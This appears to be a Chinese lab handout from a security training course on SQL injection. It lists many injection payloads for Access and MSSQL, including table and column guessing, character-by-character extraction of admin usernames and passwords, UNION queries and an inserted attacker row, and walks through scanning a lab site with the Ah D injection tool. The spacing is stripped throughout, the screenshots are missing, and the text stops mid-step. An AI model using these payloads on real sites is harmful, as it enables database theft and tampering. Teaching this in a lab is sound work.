L003001012-HTTP攻擊與防范-SQL注入攻擊-02啊D工具實例

課程編寫類別內(nèi)容實驗課題名稱HTTP攻擊與防范-SQL注入攻擊-02啊D工具實例實驗目的與要求1、了解常用web腳本2、了解常用web腳本漏洞的利用點實驗環(huán)境VPC1(虛擬PC）操作系統(tǒng)類型：windows；網(wǎng)絡接口：本地連接VPC1連接要求PC網(wǎng)絡接口，本地連接與實驗網(wǎng)絡直連軟件描述1、學生機要求安裝java環(huán)境

2、vpc安裝windows實驗環(huán)境描述學生機與實驗室網(wǎng)絡直連;VPC1與實驗室網(wǎng)絡直連;學生機與VPC1物理鏈路連通；預備知識1、類型：數(shù)字型：and1=1and1=2判斷是否存在注入字符型：'and'1'='1'and'1'='2搜索型：關鍵字%'and1=1and'%'='%關鍵字%'and1=2and'%'='%2、IIS報錯情況下使用：anduser>0（判斷是ACCESS還是MSSQL）3、不報錯則使用各自數(shù)據(jù)庫特性來判斷and(selectcount(*)frommsysobjects)>0（返回權限不足access數(shù)據(jù)庫）and(selectcount(*)fromsysobjects)>0（返回正常則為MSSQL數(shù)據(jù)庫）anddb_name（）>0(返回數(shù)據(jù)庫名)and0<>(select@@version)--(判斷版本信息)anddb_name（）>0（返回數(shù)據(jù)庫名）************注意：猜解之前先要找到后臺地址，不然白忙了**********4、ACCESS注入：（1）猜解表名（正常則存在admin,不正常則不存在）andexists(select*from[admin])and(SelectCount(*)fromAdmin)>0（2）猜解字段:（字段username存在則正常，不正常則不存在）and(SelectusernamefromAdmin)>0andexists(selectusernamefrom[admin])（3）猜解用戶名和密碼長度and(selecttop1len(username)fromAdmin)>0and(selecttop1len(password)fromAdmin)>05、原理：如果top1的username長度大于0，則條件成立；接著就是>1、>2、>3這樣測試下去，一直到條件不成立為止，比如>4成立，>5不成立，就是len(username)=5,即用戶名長度為5.得到username的長度后，用mid(username,N,1)截取第N位字符，再asc(mid(username,N,1))得到ASCII碼.6、猜解用戶and(selecttop1asc(mid(username,1,1))fromAdmin)>0,1,2…,當輸入到109時，顯示錯誤，而108之前顯示正確，說明第一個字符的ASCII碼為109，得到第一個字符是m。同理and(selecttop1asc(mid(username,2，1)fromAdmin)>0,1,2…到114的時候不成立，說明第二個字符的ASCII碼值為114，字符為r。注意的是英文和數(shù)字的ASCII碼在1-128之間...7、MSSQL注入：having1=1--【爆出一個表名及字段，如：列'users.ID'在選擇列表中無效】groupbyusers.IDhaving1=1--groupbyusers.ID,users.username,users.password,users.privshaving1=1--insertintousersvalues(666,attacker,foobar,0xffff)--【插入新記錄】8、猜解表名：SQLSERVER的每一個數(shù)據(jù)庫都會有用戶表和系統(tǒng)表，在系統(tǒng)表sysobjects中，數(shù)據(jù)庫內(nèi)創(chuàng)建的每個對象（約束、默認值、日志、規(guī)則、存儲過程等）在sysobjects表中占一行，那么也就是說當前數(shù)據(jù)庫的表名都會在該表內(nèi)有存在。我們常用到的參數(shù)有三個，name（數(shù)據(jù)表的名字），xtype（數(shù)據(jù)表的類型u為用戶表），id（數(shù)據(jù)表的對象標志）。and(selecttop1namefromsysobjectswherextype='u')>0(得到第一個表名:比如user)and(selecttop1namefromsysobjectswherextype='u'andnamenotin('user'))>0得到第二個表名，后面的以此類推。9、猜解列名：用到系統(tǒng)自帶的2個函數(shù)col_name()和object_id()，col_name()的格式是“COL_NAME(table_id,column_id)參數(shù)table_id是表的標識號，column_id是列的標識號，object_id(admin)就是得到admin在sysobjects中的標識號，column_id=1,2,3表明admin的第1，2，3列。and(selecttop1col_name(object_id('admin'),1)fromsysobjects)>0【得到admin字段的第一個列名“username”依次類推，得到“password”“id”等等】10、猜解字段內(nèi)容：and(selecttop1usernamefrom[admin])>0【直接得到用戶名】and(selecttop1passwordfrom[admin])>0【直接得到密碼】UNION聯(lián)合查詢：selectname,password,idfromuserunionselectuser,pwd,uidfrom表名and1=1unionselect1,2,3,4,5...from表名(數(shù)值從1開始慢慢加，如果加到5返回正常，那就存在5個字段)ASCII逐字解碼法：（1）猜解列長度and(selecttop1len(列名)from表名)>N其中N是數(shù)字，變換這個N的值猜解列長度，當N為6正確，為7錯誤，則長度為7猜解第二條記錄就該使用：selecttop1len(列名)from表名where列名notin(selecttop1列名from表名)（2）猜解用戶和密碼ASC()函數(shù)和Mid函數(shù),ASC(mid(列名,N,1))得到“列名”第N位字符ASCII碼猜解語句為：and(selecttop1asc(mid(字段,1,1))from數(shù)據(jù)庫名)>ASCII碼區(qū)間判斷語句：....between......and......中文處理法:當ASCII轉換后為“負數(shù)”使用abs()函數(shù)取絕對值。例：and(selecttop1abs(asc(mid(字段,1,1)))from數(shù)據(jù)庫名)=ASC碼（3）ASCII逐字解碼法的應用：1、猜解表名：and(selectcount(*)fromadmin)<>02、猜解列名：and(selectcount(列名)from表名)<>03、猜解用戶個數(shù)：and(selectcount(*)from表名)>1,2..2正常，3錯誤，表中有3條記錄。4、猜解用戶名的長度：and(selectlen(列名)from表名)>=1、>=2、>=3、>=4。5、猜解用戶名：and(selectcount(*)from表名where(asc(mid(列名,1,1)))between30and130)<>0最后提交：and(selectasc(mid(列名,1,1))from表名)=ascii的值6、猜解管理員的密碼：按照上面的原理，把上面的語句中(asc(mid(列名,1,1)的列名換成PASSWORD就能得到密碼了。實驗內(nèi)容掌握Web腳本利用掌握Web漏洞利用點掌握SQL注入工具的使用實驗步驟實驗操作學生單擊實驗拓撲按鈕，進入實驗場景，（第一次啟動目標主機，還需要安裝java控件）。，學生輸入賬號administrator，密碼123456，登錄到實驗場景中的目標主機。如圖所示：打開IE瀏覽器，登錄網(wǎng)站。如圖所示：打開D:\tools目錄啊D.rar解壓包，點擊啊D->QiQi.exe。如圖所示：打開QiQi.exe軟件，點擊登錄進入。如圖所示：點擊登陸：在檢測網(wǎng)址欄中輸入，點擊掃描注入點，并點擊打開網(wǎng)頁。如圖所示：注：圖中4就是檢測出來可用注入的點。雙擊“可用注入點”中的紅色網(wǎng)址。進入如圖所示頁面：點擊檢測按鈕，軟件提示準備就緒，點擊檢測表段，即可對字段進行掃描。如圖所示：9、點擊檢測表段中的“admin”，然后點擊檢測字段。即可看到如圖所示字段：10、勾選上username、password、id并點擊檢測